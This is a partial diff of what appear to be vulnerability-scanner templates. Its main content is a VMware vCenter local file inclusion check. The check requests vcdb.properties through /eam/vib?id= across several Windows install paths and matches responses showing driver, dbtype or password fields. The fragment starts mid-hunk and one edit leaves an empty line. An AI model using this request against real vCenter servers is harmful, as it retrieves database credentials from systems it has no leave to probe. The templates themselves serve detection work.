-        test@{{randstr.tld}}
+        test@{{randstr}}.tld
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="editid"
--- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
+++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
@ -12,7 +12,7 @@ info:
 requests:
  - raw:
      - |
-        GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1
+        GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
        Host: {{Hostname}}
    payloads:
@ -20,14 +20,13 @@ requests:
        - "C:\\ProgramData\\VMware\\VMware+VirtualCenter"  # vCenter Server 5.5 and earlier (Windows 2008)
        - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter"  # Other Windows versions
        - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx"  # vCenter Server => 6.0
    attack: sniper
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
-        part: body
+
      - type: status
        status:
          - 200